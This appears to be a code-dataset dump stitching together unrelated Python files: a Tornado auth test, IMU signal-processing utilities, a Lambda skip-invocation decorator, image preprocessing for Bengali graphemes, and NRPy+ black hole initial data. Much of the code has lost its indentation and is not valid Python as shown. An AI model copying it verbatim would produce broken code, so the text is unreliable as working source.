@auth_required(realm='Protected', auth_func=credentials.get)
def get(self):
self.write('Hello %s' % self._current_user)
class DigestAuthHandler(DigestAuthMixin, RequestHandler):
@auth_required(realm='Protected', auth_func=credentials.get)
def get(self):
self.write('Hello %s' % self._current_user)
class AuthTest(AsyncHTTPTestCase):
def get_app(self):
urls = [
('/digest', DigestAuthHandler),
('/basic', BasicAuthHandler),
]
return Application(urls, http_client=self.http_client)
def test_digest_auth(self):
res = self.fetch('/digest')
self.assertEqual(res.code, 401)
# TODO: Add digest authentication to HTTPClient in order to test this.
def test_basic_auth(self):
res = self.fetch('/basic')
self.assertEqual(res.code, 401)
auth = '%s:%s' % ('user1', '<PASSWORD>')
auth = b64encode(auth.encode('ascii'))
hdr = {'Authorization': 'Basic %s' % auth.decode('utf8')}
res = self.fetch('/basic', headers=hdr)
self.assertEqual(res.code, 200)
|
StarcoderdataPython
|
8184314
|
<gh_stars>0
import scipy
import scipy.fft           # needed by FDI() below
import scipy.interpolate   # needed by fix_outlier() below
import matplotlib.pyplot as plt
import numpy as np
import ahrs
import pandas as pd
import scipy.signal as signal
import scipy.integrate as intg
from numpy import pi
from scipy.fftpack import fft, ifft, dct, idct, dst, idst, fftshift, fftfreq
from numpy import linspace, zeros, array, pi, sin, cos, exp, arange
import emd
# import ssqueezepy as sq  # optional dependency, required only by WSST()
fs = 1660
dt = 1/fs
def prep_data(df, fs, fc, factor):
t = df.index.to_numpy()
if df.rot.max()>=300.0:
df['rot'] = np.deg2rad(df['rot'])
df.rot = np.unwrap(df.rot)
b,a = scipy.signal.cheby1(23, 0.175, fc, fs=fs)
S = scipy.signal.filtfilt(b, a, df, axis=0)
# S[:,2:] = freqfilt(S[:,2:], fs, fc)
ss, tt = scipy.signal.resample(S,factor*len(S), t=t, axis=0, window='hann')
# ss[:,0] = ss[:,0]%(2*np.pi)
# ss = ss[100:-100,:]
# tt = tt[100:-100]
FS = factor*fs
cma = np.array([-4.4019e-004 , 1.2908e-003, -1.9633e-002])
La = np.array([-8.3023e-019, -8.1e-002, -8.835e-002])
posa = La-cma
cmb = np.array([8.0563e-005, 5.983e-004, -6.8188e-003])
Lb = np.array([5.3302e-018, -7.233e-002, 3.12e-002+2.0e-003])
posb = Lb-cmb
A = imu2body(ss[:,2:8],tt, FS, posa)
B = imu2body(ss[:,8:], tt, FS, posb)
C = pd.DataFrame({'cur': ss[:,1],'rot': ss[:,0]},tt)
Q = [A, B, C]
for ii in range(len(Q)):
_q, _t = scipy.signal.resample(Q[ii], len(Q[ii])//factor, t=Q[ii].index, axis=0, window='hann')
Q[ii] = pd.DataFrame(_q,_t, columns=Q[ii].columns)
A, B, C = Q
C['rot'] = C['rot']%(2*np.pi)
return A, B, C, FS/factor
def freqfilt(data, fs, fc):
data[:,0] = np.unwrap(np.deg2rad(data[:,0]))
N = len(data)
ff = fftfreq(N,1/fs)
k = (abs(ff)<=fc).reshape((N,1))
Data = fft(data, axis=0)
Data.real = Data.real*k
# Data.real = Data.real*k
data_out = np.real(ifft(Data, axis=0))
data_out[:,0] = data_out[:,0]%(2*np.pi)
return data_out
def fix_outlier(_data):
_m = _data.mean()
peaks,_ = scipy.signal.find_peaks(abs(_data.flatten()),width=1, prominence=2, height=3*_m, distance=5)
for peak in peaks:
        _f = scipy.interpolate.interp1d(np.array([0,9]), np.array([_data[peak-5],_data[peak+5]]).T, kind='linear')
_data[peak-5:peak+5] = _f(np.arange(0,10)).T
return _data
# def PSD(_data, fs):
# f, Pxx = scipy.signal.welch(_data, fs, nperseg=fs//4, noverlap=fs//8, window='hann', average='median', scaling='spectrum', detrend='linear', axis=0)
# plt.figure()
# plt.subplot(211)
# _t = np.linspace(0, len(_data)*dt, len(_data))
# plt.plot(_t, _data)
# plt.subplot(212)
# plt.semilogx(f, 20*np.log10(abs(Pxx)))
# plt.xlim((1,415))
# plt.grid()
def PSD(df, fs, units='units'):
    f, Pxx = scipy.signal.welch(df, fs, nperseg=fs//4, noverlap=fs//8, window='hann', average='mean', scaling='density', detrend=False, axis=0)
    plt.figure()
    plt.subplot(211)
    plt.title('Signal')
    plt.xlabel('Time [s]')
    plt.ylabel('Amplitude [{}]'.format(units))
    plt.plot(df)
    plt.legend(df.columns)
    plt.subplot(212)
    plt.title('Power Spectral Density')
    plt.plot(f, 20*np.log10(abs(Pxx)))
    plt.xlim((1,480))
    plt.xlabel('Frequency [Hz]')
    plt.ylabel('PSD [({})²/Hz]'.format(units))
# plt.legend(['Piezo', 'MEMS'])
plt.grid()
plt.tight_layout()
def FDI(data, factor=1, NFFT=fs//4):
n = NFFT
try:
width = data.shape[1]
except:
width = 0
_data = np.vstack((np.zeros((2*n,width)), data, np.zeros((2*n,width))))
N = len(_data)
w = scipy.signal.windows.hann(n).reshape((n,1))
Data = np.zeros_like(_data, dtype=complex)
for ii in range(0, N-n, n//2):
Y = _data[ii:ii+n,:]*w
k = (1j*2*np.pi*scipy.fft.fftfreq(len(Y), dt).reshape((n,1)))
y = (scipy.fft.ifft(np.vstack((np.zeros((factor,width)),scipy.fft.fft(Y, axis=0)[factor:]/(k[factor:]))), axis=0))
Data[ii:ii+n,:] += y
return np.real(Data[2*n:-2*n,:])
# def spect(df,fs, dbmin=80):
# plt.figure()
# if len(_data.shape)<2:
# _data = _data.reshape((len(_data),1))
# kk = _data.shape[1]
# for ii in range(kk):
# plt.subplot(kk*100+10+ii+1)
# f, t, Sxx = scipy.signal.spectrogram(_data[:,ii], fs=fs, axis=0, scaling='spectrum', nperseg=fs//4, noverlap=fs//8, detrend='linear', mode='psd', window='hann')
# Sxx[Sxx==0] = 10**(-20)
# plt.pcolormesh(t, f, 20*np.log10(abs(Sxx)), shading='auto', cmap=plt.inferno(),vmax=20*np.log10(abs(Sxx)).max(), vmin=20*np.log10(abs(Sxx)).max()-dbmin)
# plt.ylim((0, 300))
# plt.colorbar()
# plt.ylabel('Frequency [Hz]')
# plt.xlabel('Time [sec]')
# plt.tight_layout()
# plt.show()
def spect(df,fs, dbmin=80, print=True, freqlims=(1,480)):
for frame in df:
f, t, Sxx = scipy.signal.spectrogram(df[frame], fs=fs, axis=0, scaling='spectrum', nperseg=fs//2, noverlap=fs//4, detrend=False, mode='psd', window='hann')
Sxx[Sxx==0] = 10**(-20)
if print==True:
plt.figure()
plt.pcolormesh(t, f, 20*np.log10(abs(Sxx)), shading='gouraud', cmap='turbo',vmax=20*np.log10(abs(Sxx)).max(), vmin=20*np.log10(abs(Sxx)).max()-dbmin)
plt.ylim(freqlims)
plt.colorbar()
plt.title(frame)
plt.ylabel('Frequency [Hz]')
plt.xlabel('Time [sec]')
plt.tight_layout()
plt.show()
else:
return t, f, 20*np.log10(abs(Sxx))
def FDD(_data, factor=1, NFFT=fs):
N = len(_data)
try:
width = _data.shape[1]
except:
_data = _data.reshape((N,1))
width = 1
n = NFFT
w = signal.windows.hann(n).reshape((n,1))
Data = np.zeros_like(_data, dtype=complex)
for ii in range(0, N-n, n//2):
Y = _data[ii:ii+n,:]*w
k = (1j*2*pi*fftfreq(len(Y), dt).reshape((n,1)))
y = (ifft(np.vstack((np.zeros((factor,width)),fft(Y, axis=0)[factor:]*(k[factor:]))), axis=0))
Data[ii:ii+n,:] += y
return np.real(Data)
def TDI(_data):
N = len(_data)
if len(_data.shape)==1:
_data = _data.reshape((N,1))
_data = zmean(_data)
_dataout = np.zeros_like(_data)
_dataout[0,:] = _data[0,:]*dt/2
for ii in range(1,N):
_dataout[ii,:] = intg.simpson(_data[0:ii,:], dx=dt, axis=0)
return _dataout
def zmean(_data):
return np.real(ifft(np.vstack((np.zeros((2,_data.shape[1])),fft(_data, axis=0)[2:])), axis=0))
def imu2body(df, t, fs, pos=[0, 0, 0]):
gyr = df[:,0:3]
acc = df[:,3:]
grv = np.array([[0],[0],[-9.81]])
alpha = FDD(gyr)
accc = acc + np.cross(gyr,np.cross(gyr,pos)) + np.cross(alpha,pos)
q0=ahrs.Quaternion(ahrs.common.orientation.acc2q(accc[0]))
imu = ahrs.filters.Complementary(acc=accc, gyr=gyr, frequency=fs, q0=q0, gain=0.000001)
theta = ahrs.QuaternionArray(imu.Q).to_angles()
acccc = np.zeros_like(accc)
for ii in range(len(acc)):
acccc[ii,:] = accc[ii,:] + ahrs.Quaternion(imu.Q[ii]).rotate(grv).T
v = FDI(acccc)
d = FDI(v)
ah = {}
ah['Dx'] = d[:,0]
ah['Dy'] = d[:,1]
ah['Dz'] = d[:,2]
ah['Vx'] = v[:,0]
ah['Vy'] = v[:,1]
ah['Vz'] = v[:,2]
ah['Ax'] = acccc[:,0]
ah['Ay'] = acccc[:,1]
ah['Az'] = acccc[:,2]
ah['thx'] = theta[:,0]
ah['thy'] = theta[:,1]
ah['thz'] = theta[:,2]
ah['omx'] = gyr[:,0]
ah['omy'] = gyr[:,1]
ah['omz'] = gyr[:,2]
ah['alx'] = alpha[:,0]
ah['aly'] = alpha[:,1]
ah['alz'] = alpha[:,2]
dataFrame = pd.DataFrame(ah, t)
return dataFrame
def vizspect(tt, ff, Sxx, Title, xlims=None, ylims=None, fscale='linear'):
fig = plt.figure()
ax = fig.add_subplot(111)
plt.yscale(fscale)
spec = ax.imshow(Sxx, aspect='auto', cmap='turbo', extent=[tt[0], tt[-1], ff[0], ff[-1]])
plt.colorbar(spec)
ax.set_xlim(xlims)
ax.set_ylim(ylims)
ax.set_title(Title)
ax.set_xlabel('Time [s]')
ax.set_ylabel('Frequency [Hz]')
fig.show()
def apply_emd(df, fs):
t = df.index.to_numpy()
mfreqs = np.array([360,300,240,180,120,90,60,30,15,7.5])
for frame in df.columns:
S = df[frame].to_numpy()
imf, _ = emd.sift.mask_sift(S, mask_freqs=mfreqs/fs, mask_amp_mode='ratio_sig', ret_mask_freq=True, nphases=8, mask_amp=S.max())
Ip, If, Ia = emd.spectra.frequency_transform(imf, fs, 'nht')
emd.plotting.plot_imfs(imf,t, scale_y=True, cmap=True)
plt.suptitle('IMFs - {}'.format(frame))
emd.plotting.plot_imfs(Ia,t, scale_y=True, cmap=True)
plt.suptitle(' Envelope - {}'.format(frame))
# emd.plotting.plot_imfs(Ip,t, scale_y=True, cmap=True)
# emd.plotting.plot_imfs(If,t, scale_y=True, cmap=True)
def WSST(df, fs, ridge_ext = False):
t = df.index.to_numpy()
for frame in df.columns:
S = df[frame].to_numpy()
Tw, _, nf, na, *_ = sq.ssq_cwt(S, fs=fs, nv=64, ssq_freqs='linear', maprange='energy')
vizspect(t, nf, np.abs(Tw), 'WSST - '+frame, ylims=[1, 480])
if ridge_ext:
ridge = sq.ridge_extraction.extract_ridges(Tw, bw=4, scales=nf, n_ridges=3)
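# Minimal sanity check for the frequency-domain integrator FDI() above (a sketch, not part
# of the original pipeline): integrating cos(2*pi*f0*t) should give approximately
# sin(2*pi*f0*t)/(2*pi*f0) away from the zero-padded edges.
if __name__ == "__main__":
    t_demo = np.arange(0, 4.0, dt)
    f0 = 50.0
    acc_demo = np.cos(2 * np.pi * f0 * t_demo).reshape(-1, 1)
    vel_demo = FDI(acc_demo)
    print("expected peak amplitude:", 1.0 / (2 * np.pi * f0))
    print("measured peak amplitude:", np.abs(vel_demo[fs:-fs]).max())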
|
StarcoderdataPython
|
4821269
|
import functools
from typing import Any, Callable, Dict, Optional, Union
def skip_invocation(determinator: Optional[Union[str, bool, Callable[[Dict[str, Any], Any], bool]]] = None) -> Union[Callable, None]:
"""
A decorator which allows to skip decorated function's execution if certain conditions are met.
By default it returns decorated function's execution if no arguments are provided.
If a determinator of type 'str' is provided, the decorator checks whether this key exists function's event 'dict' as parses result as 'bool' type.
If a determinator of type 'bool' is provided, the decorator parses its value.
If a callable object is provided as determinator, the decorator parses its value as 'bool'.
Callable should accept 2 arguments - Lambda function's event and context.
If any of the above evaluate to 'bool' of value True, the decorated function is not executed.
:param determinator: An object which is used to evaluate whether to execute the decorated function.
:return: Decorated function or None.
Examples
========
When no parameter is passed as decorator's determinator.
>>> item = {'heartbeat': True}
>>> context = ''
>>> @skip_invocation()
... def handler(event, context):
... return event
>>> handler(item, context)
{'heartbeat': True}
When a 'bool' of value True is provided (decorated function does not invoke).
>>> item = {'heartbeat': True}
>>> context = ''
>>> @skip_invocation(determinator=True)
... def handler(event, context):
... return event
>>> handler(item, context)
>>>
When a 'str' is provided which exists in event's 'dict' (decorated function does not invoke).
>>> item = {'heartbeat': True}
>>> context = ''
>>> @skip_invocation(determinator="heartbeat")
... def handler(event, context):
... return event
>>> handler(item, context)
>>>
When a callable is provided which evaluates to True.
Callable should take 2 arguments - Lambda function's event and context.
>>> item = {'heartbeat': True}
>>> context = ''
>>> is_heartbeat = lambda e, c: "heartbeat" in e
>>> @skip_invocation(determinator=is_heartbeat)
... def handler(event, context):
... return event
>>> handler(item, context)
>>>
"""
def wrapper(func):
@functools.wraps(func)
def wrapped_f(*args, **kwargs):
skip = False
event: Dict[str, Any] = args[0]
context: Any = args[1]
if isinstance(determinator, str):
skip = bool(event.get(determinator, False))
elif isinstance(determinator, bool):
skip = determinator
elif callable(determinator):
skip = bool(determinator(event, context))
if skip:
return
return func(*args, **kwargs)
return wrapped_f
return wrapper
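# The docstring above doubles as doctests; a quick way to exercise them (the filename
# skip_invocation.py is hypothetical -- use whatever this module is saved as):
#     python -m doctest skip_invocation.py -v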
|
StarcoderdataPython
|
1778212
|
<gh_stars>0
import calendar
import time
for x in range(2000, 2031):
y = calendar.isleap(x)
print(f'YEAR {x} -> LEAP_YEAR = {y}')
for d in calendar.day_name:
print(d)
print('NOW IS', time.ctime())
XLIST = [10, 20, 30, 40]
for x in XLIST:
print(f'x = {x} ...')
time.sleep(5)
|
StarcoderdataPython
|
11375329
|
<gh_stars>10-100
# Author: <NAME> <<EMAIL>>
# Copyright (c) 2021 <NAME>
#
# This file is part of Monet.
from ..visualize.util import DEFAULT_PLOTLY_COLORS, DEFAULT_GGPLOT_COLORS
def get_default_cluster_colors(colorscheme: str = None):
cluster_colors = {}
if colorscheme == 'plotly':
numeric_colors = DEFAULT_PLOTLY_COLORS
name_colors = DEFAULT_PLOTLY_COLORS
elif colorscheme == 'ggplot':
numeric_colors = DEFAULT_GGPLOT_COLORS
name_colors = DEFAULT_GGPLOT_COLORS
else:
numeric_colors = DEFAULT_GGPLOT_COLORS
name_colors = DEFAULT_PLOTLY_COLORS
    # set default colors for first 20 clusters,
    # assuming they are named correctly
    # ("Cluster 1", "Cluster 2", ..., or "1", "2", ...)
    for i in range(20):
        # for 0, 1, ..., we use the numeric color scheme (ggplot by default)
        cluster_colors[i] = numeric_colors[i]
        # for "Cluster 1", "Cluster 2", ..., we use the name color scheme (plotly by default)
        cluster_colors['Cluster %d' % (i+1)] = name_colors[i]
# also set default color for cluster named "Outliers"
cluster_colors['Outliers'] = 'lightgray'
return cluster_colors
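# Usage sketch (for reference): build a label -> color mapping for plotting.
#     colors = get_default_cluster_colors()
#     colors[0]             # first numeric-label color (ggplot palette by default)
#     colors['Cluster 1']   # first named-cluster color (plotly palette by default)
#     colors['Outliers']    # 'lightgray'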
|
StarcoderdataPython
|
3447343
|
import numpy as np
from numpy import ndarray
from yacs.config import CfgNode
from albumentations import OneOf, Compose, MotionBlur, MedianBlur, Blur, RandomBrightnessContrast, GaussNoise, \
GridDistortion, Rotate, HorizontalFlip, CoarseDropout, Cutout
from .grid_mask import GridMask
from typing import Union, List, Tuple
from .augmix import augmentations, augment_and_mix
import cv2
from cv2 import resize
import torch
def content_crop(img: ndarray, white_background: bool):
"""
    Center the content, with the empty border removed
    https://www.kaggle.com/iafoss/image-preprocessing-128x128
    :param img: grapheme image matrix
    :param white_background: whether the image has a white background
:return: cropped image matrix
"""
# Remove the surrounding 5 pixels
img = img[5:-5, 5:-5]
if white_background:
y_list, x_list = np.where(img < 235)
else:
y_list, x_list = np.where(img > 80)
# get xy min max
xmin, xmax = np.min(x_list), np.max(x_list)
ymin, ymax = np.min(y_list), np.max(y_list)
# Manually set the baseline low and high for x&y
xmin = xmin - 13 if (xmin > 13) else 0
ymin = ymin - 10 if (ymin > 10) else 0
xmax = xmax + 13 if (xmax < 223) else 236
ymax = ymax + 10 if (ymax < 127) else 137
# Reposition the images
img = img[ymin:ymax, xmin:xmax]
return img
def pad_to_square(img: ndarray, white_background: bool):
ly, lx = img.shape
l = max(lx, ly) + 16
if white_background:
constant_pad = 255
else:
constant_pad = 0
img = np.pad(img, [((l - ly) // 2,), ((l - lx) // 2,)], mode='constant', constant_values=constant_pad)
return img
class Preprocessor(object):
"""
bengali data preprocessor
"""
def __init__(self, node_cfg_dataset: CfgNode):
"""
Constructor of the Preprocessing from the Configuration Node properties.
:param node_cfg_dataset: dataset config
"""
        # Augmentation node holds all augmentation settings of the dataset config
aug_cfg = node_cfg_dataset.AUGMENTATION
# !!!Training ONLY!!!
# Color augmentation settings,
self.color_aug = self.generate_color_augmentation(aug_cfg)
# Shape augmentation settings
self.shape_aug = self.generate_shape_augmentation(aug_cfg)
# Cutout augmentation settings
self.cutout_aug = self.generate_cutout_augmentation(aug_cfg)
self.pad = node_cfg_dataset.PAD_TO_SQUARE
self.white_background = node_cfg_dataset.WHITE_BACKGROUND
self.do_augmix = node_cfg_dataset.DO_AUGMIX
# !!!~~~BOTH~~~!!!
# Color augmentation settings,
self.resize_shape = node_cfg_dataset.RESIZE_SHAPE
# Crop augmentation settings,
self.crop = node_cfg_dataset.CONCENTRATE_CROP
# Convert to RGB
self.to_rgb = node_cfg_dataset.TO_RGB
# Normalize Mean or STD?
self.normalize_mean = node_cfg_dataset.get('NORMALIZE_MEAN')
self.normalize_std = node_cfg_dataset.get('NORMALIZE_STD')
if self.do_augmix:
augmentations.IMAGE_SIZE = node_cfg_dataset.RESIZE_SHAPE[0]
if not self.to_rgb:
self.normalize_mean = np.mean(self.normalize_mean)
self.normalize_std = np.mean(self.normalize_std)
@staticmethod
def generate_color_augmentation(aug_cfg: CfgNode) -> Union[Compose, None]:
"""
generate color augmentation object
:param aug_cfg: augmentation config
:return color_aug: color augmentation object
"""
color_aug_list = []
if aug_cfg.BRIGHTNESS_CONTRAST_PROB > 0:
color_aug_list.append(RandomBrightnessContrast(p=aug_cfg.BRIGHTNESS_CONTRAST_PROB))
if aug_cfg.BLURRING_PROB > 0:
blurring = OneOf([
MotionBlur(aug_cfg.BLUR_LIMIT, p=1),
MedianBlur(aug_cfg.BLUR_LIMIT, p=1),
Blur(aug_cfg.BLUR_LIMIT, p=1),
], p=aug_cfg.BLURRING_PROB)
color_aug_list.append(blurring)
if aug_cfg.GAUSS_NOISE_PROB > 0:
color_aug_list.append(GaussNoise(p=aug_cfg.GAUSS_NOISE_PROB))
if aug_cfg.GRID_MASK_PROB > 0:
color_aug_list.append(GridMask(num_grid=(3, 7), p=aug_cfg.GRID_MASK_PROB))
if len(color_aug_list) > 0:
color_aug = Compose(color_aug_list, p=1)
return color_aug
else:
return None
@staticmethod
def generate_shape_augmentation(aug_cfg: CfgNode) -> Union[Compose, None]:
"""
generate shape augmentations
:param aug_cfg: augmentation config
:return shape_aug: shape augmentation object
"""
shape_aug_list = []
if aug_cfg.ROTATION_PROB > 0:
shape_aug_list.append(
Rotate(limit=aug_cfg.ROTATION_DEGREE, border_mode=1, p=aug_cfg.ROTATION_PROB)
)
if aug_cfg.GRID_DISTORTION_PROB > 0:
shape_aug_list.append(GridDistortion(p=aug_cfg.GRID_DISTORTION_PROB))
if aug_cfg.HORIZONTAL_FLIP_PROB > 0:
shape_aug_list.append(HorizontalFlip(p=aug_cfg.HORIZONTAL_FLIP_PROB ))
if len(shape_aug_list) > 0:
shape_aug = Compose(shape_aug_list, p=1)
return shape_aug
else:
return None
@staticmethod
def generate_cutout_augmentation(aug_cfg: CfgNode):
cutout_aug_list = []
if aug_cfg.CUTOUT_PROB > 0:
cutout_aug_list.append(Cutout(num_holes=1, max_h_size=aug_cfg.HEIGHT//2, max_w_size=aug_cfg.WIDTH//2,
fill_value=255, p=aug_cfg.CUTOUT_PROB))
if len(cutout_aug_list) > 0:
cutout_aug = Compose(cutout_aug_list, p=1)
return cutout_aug
else:
return None
def __call__(self, img: ndarray, is_training: bool, normalize: bool = True) -> Union[ndarray, Tuple]:
"""
Conduct the transformation
:param img: input img array
:param is_training: whether it's training (to do augmentation)
:return : transformed data
"""
x = img
# if not white background, reverse
if not self.white_background:
x = 255 - x
# crop
if self.crop:
x = content_crop(x, self.white_background)
if self.pad:
x = pad_to_square(x, self.white_background)
# resize
x = resize(x, self.resize_shape)
# to RGB
if self.to_rgb:
x = np.repeat(np.expand_dims(x, axis=-1), 3, axis=-1)
else:
x = np.expand_dims(x, axis=-1)
        # shape / color / cutout augmentation (training only)
        if is_training:
            if self.do_augmix:
                return self.compute_augmix_inputs(img)
            # normal shape and color changes
            if self.shape_aug is not None:
                x = self.shape_aug(image=x)['image']
            if self.color_aug is not None:
                x = self.color_aug(image=x)['image']
            if self.cutout_aug is not None:
                x = self.cutout_aug(image=x)['image']
        if not normalize:
            return x
        x = self.normalize_img(x)
        return x
def normalize_img(self, x: ndarray) -> ndarray:
"""
Normalize image to a specific mean/std if they are specifiied, otherwise, default to /255
:param x:
:return:
"""
# normalize to 0-1
x = x / 255.
if self.normalize_mean is not None:
x = (x - self.normalize_mean) / self.normalize_std
return x
def compute_augmix_inputs(self, img):
aug1 = augment_and_mix(img)
aug1 = self.normalize_img(aug1)
aug2 = augment_and_mix(img)
aug2 = self.normalize_img(aug2)
img = self.normalize_img(img)
return img, aug1, aug2
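# Usage sketch for the standalone helpers above (hedged: the file name and image size are
# illustrative only; the full Preprocessor needs a YACS CfgNode, which is not shown here):
#     img = cv2.imread('grapheme.png', cv2.IMREAD_GRAYSCALE)   # e.g. a 137x236 grapheme crop
#     img = content_crop(img, white_background=True)
#     img = pad_to_square(img, white_background=True)
#     img = resize(img, (128, 128))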
|
StarcoderdataPython
|
3357869
|
<filename>BSSN/UIUCBlackHole.py
# This module sets up UIUC Black Hole initial data in terms of
# the variables used in BSSN_RHSs.py
# Authors: <NAME>, zachetie **at** gmail **dot** com
# <NAME>, terrencepierrej **at** gmail **dot** com
# <NAME>
# ## This module sets up initial data for a single spinning (UIUC) black hole in spherical coordinates. We can convert from spherical to any coordinate system defined in [reference_metric.py](../edit/reference_metric.py) (e.g., SinhSpherical, Cylindrical, Cartesian, etc.) using the [Exact ADM Spherical-to-BSSNCurvilinear converter module](Tutorial-ADM_Initial_Data-Converting_Exact_ADM_Spherical_or_Cartesian_to_BSSNCurvilinear.ipynb)
#
# ### Here we set up UIUC Black Hole initial data ([Liu, Etienne, & Shapiro, PRD 80 121503, 2009](https://arxiv.org/abs/1001.4077)):
#
# UIUC black holes have the advantage of finite coordinate radius in the maximal spin limit. It is therefore excellent for studying very highly spinning black holes. This module sets the UIUC black hole at the origin.
#
# **Inputs for initial data**:
#
# * The black hole mass $M$.
# * The dimensionless spin parameter $\chi = a/M$
#
# **Additional variables needed for spacetime evolution**:
#
# * Desired coordinate system
# * Desired initial lapse $\alpha$ and shift $\beta^i$. We will choose our gauge conditions as $\alpha=1$ and $\beta^i=B^i=0$. $\alpha = \psi^{-2}$ will yield much better behavior, but the conformal factor $\psi$ depends on the desired *destination* coordinate system (which may not be spherical coordinates).
# Step P0: Load needed modules
import sympy as sp # SymPy: The Python computer algebra package upon which NRPy+ depends
import NRPy_param_funcs as par # NRPy+: Parameter interface
import indexedexp as ixp # NRPy+: Symbolic indexed expression (e.g., tensors, vectors, etc.) support
import sys # Standard Python module for multiplatform OS-level functions
from pickling import pickle_NRPy_env # NRPy+: Pickle/unpickle NRPy+ environment, for parallel codegen
import BSSN.ADM_Exact_Spherical_or_Cartesian_to_BSSNCurvilinear as AtoB
thismodule = __name__
# The UIUC initial data represent a Kerr black hole with mass M
# and dimensionless spin chi in UIUC quasi-isotropic coordinates,
# see https://arxiv.org/abs/1001.4077
# Input parameters:
M, chi = par.Cparameters("REAL", thismodule, ["M", "chi"], [1.0, 0.99])
# ComputeADMGlobalsOnly == True will only set up the ADM global quantities.
# == False will perform the full ADM SphorCart->BSSN Curvi conversion
def UIUCBlackHole(ComputeADMGlobalsOnly = False, include_NRPy_basic_defines_and_pickle=False):
global Sph_r_th_ph,r,th,ph, gammaSphDD, KSphDD, alphaSph, betaSphU, BSphU
# All gridfunctions will be written in terms of spherical coordinates (r, th, ph):
r,th,ph = sp.symbols('r th ph', real=True)
# Step 0: Set spatial dimension (must be 3 for BSSN)
DIM = 3
par.set_parval_from_str("grid::DIM",DIM)
# Step 1: Set psi, the conformal factor:
# Spin per unit mass
a = M*chi
# Defined under equation 1 in Liu, Etienne, & Shapiro (2009) https://arxiv.org/pdf/1001.4077.pdf
# Boyer - Lindquist outer horizon
rp = M + sp.sqrt(M**2 - a**2)
# Boyer - Lindquist inner horizon
rm = M - sp.sqrt(M**2 - a**2)
# Boyer - Lindquist radius in terms of UIUC radius
# Eq. 11
# r_{BL} = r * ( 1 + r_+ / 4r )^2
rBL = r*(1 + rp / (4*r))**2
# Expressions found below Eq. 2
# Sigma = r_{BL}^2 + a^2 cos^2 theta
SIG = rBL**2 + a**2*sp.cos(th)**2
# Delta = r_{BL}^2 - 2Mr_{BL} + a^2
DEL = rBL**2 - 2*M*rBL + a**2
# A = (r_{BL}^2 + a^2)^2 - Delta a^2 sin^2 theta
AA = (rBL**2 + a**2)**2 - DEL*a**2*sp.sin(th)**2
# *** The ADM 3-metric in spherical basis ***
gammaSphDD = ixp.zerorank2()
# Declare the nonzero components of the 3-metric
# (Eq. 13 of Liu, Etienne, & Shapiro, https://arxiv.org/pdf/1001.4077.pdf):
# ds^2 = Sigma (r + r_+/4)^2 / ( r^3 (r_{BL} - r_- ) * dr^2 +
# Sigma d theta^2 + (A sin^2 theta) / Sigma * d\phi^2
gammaSphDD[0][0] = ((SIG*(r + rp/4)**2)/(r**3*(rBL - rm)))
gammaSphDD[1][1] = SIG
gammaSphDD[2][2] = AA/SIG*sp.sin(th)**2
# *** The physical trace-free extrinsic curvature in spherical basis ***
# Nonzero components of the extrinsic curvature K, given by
# Eq. 14 of Liu, Etienne, & Shapiro, https://arxiv.org/pdf/1001.4077.pdf:
KSphDD = ixp.zerorank2()
# K_{r phi} = K_{phi r} = (Ma sin^2 theta) / (Sigma sqrt{A Sigma}) *
# [3r^4_{BL} + 2a^2 r^2_{BL} - a^4 - a^2 (r^2_{BL} - a^2) sin^2 theta] *
# (1 + r_+ / 4r) (1 / sqrt{r(r_{BL} - r_-)})
KSphDD[0][2] = KSphDD[2][0] = (M*a*sp.sin(th)**2)/(SIG*sp.sqrt(AA*SIG))*\
(3*rBL**4 + 2*a**2*rBL**2 - a**4- a**2*(rBL**2 - a**2)*\
sp.sin(th)**2)*(1 + rp/(4*r))*1/sp.sqrt(r*(rBL - rm))
# Components of the extrinsic curvature K, given by
# Eq. 15 of Liu, Etienne, & Shapiro, https://arxiv.org/pdf/1001.4077.pdf:
# K_{theta phi} = K_{phi theta} = -(2a^3 Mr_{BL} cos theta sin^3 theta) /
# (Sigma sqrt{A Sigma}) x (r - r_+ / 4) sqrt{(r_{BL} - r_-) / r }
KSphDD[1][2] = KSphDD[2][1] = -((2*a**3*M*rBL*sp.cos(th)*sp.sin(th)**3)/ \
(SIG*sp.sqrt(AA*SIG)))*(r - rp/4)*sp.sqrt((rBL - rm)/r)
alphaSph = sp.sympify(1) # We generally choose alpha = 1/psi**2 (psi = BSSN conformal factor) for these initial data
betaSphU = ixp.zerorank1() # We generally choose \beta^i = 0 for these initial data
BSphU = ixp.zerorank1() # We generally choose B^i = 0 for these initial data
if ComputeADMGlobalsOnly:
return
# Validated against original SENR: KSphDD[0][2], KSphDD[1][2], gammaSphDD[2][2], gammaSphDD[0][0], gammaSphDD[1][1]
#print(sp.mathematica_code(gammaSphDD[1][1]))
Sph_r_th_ph = [r,th,ph]
cf,hDD,lambdaU,aDD,trK,alpha,vetU,betU = \
AtoB.Convert_Spherical_or_Cartesian_ADM_to_BSSN_curvilinear("Spherical", Sph_r_th_ph,
gammaSphDD,KSphDD,alphaSph,betaSphU,BSphU)
# Let's choose alpha = 1/psi**2 (psi = BSSN conformal factor) for these initial data,
# where psi = exp(phi); chi = 1/psi**4; W = 1/psi**2
if par.parval_from_str("EvolvedConformalFactor_cf") == "phi":
alpha = sp.exp(-2*cf)
elif par.parval_from_str("EvolvedConformalFactor_cf") == "chi":
alpha = sp.sqrt(cf)
elif par.parval_from_str("EvolvedConformalFactor_cf") == "W":
alpha = cf
else:
print("Error EvolvedConformalFactor_cf type = \""+par.parval_from_str("EvolvedConformalFactor_cf")+"\" unknown.")
sys.exit(1)
import BSSN.BSSN_ID_function_string as bIDf
# Generates initial_data() C function & stores to outC_function_dict["initial_data"]
bIDf.BSSN_ID_function_string(cf, hDD, lambdaU, aDD, trK, alpha, vetU, betU,
include_NRPy_basic_defines=include_NRPy_basic_defines_and_pickle)
if include_NRPy_basic_defines_and_pickle:
return pickle_NRPy_env()
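# Usage sketch (hedged: assumes a standard NRPy+ environment has been initialized; only the
# ADM globals defined above are inspected, no BSSN conversion is performed):
#     import BSSN.UIUCBlackHole as uibh
#     uibh.UIUCBlackHole(ComputeADMGlobalsOnly=True)
#     print(uibh.gammaSphDD[0][0])   # symbolic gamma_{rr} in the spherical basis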
|
StarcoderdataPython
|
324655
|
# Copyright 2021 The Kubeflow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
